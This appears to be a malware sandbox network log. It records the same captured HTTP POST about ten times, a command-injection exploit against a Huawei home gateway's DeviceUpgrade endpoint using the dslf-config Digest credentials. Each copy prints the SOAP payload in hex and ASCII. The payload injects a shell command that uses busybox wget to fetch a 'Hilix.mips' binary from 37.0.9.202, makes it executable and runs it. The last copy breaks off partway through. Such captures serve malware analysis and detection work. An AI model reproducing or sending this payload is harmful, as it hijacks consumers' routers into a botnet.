    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 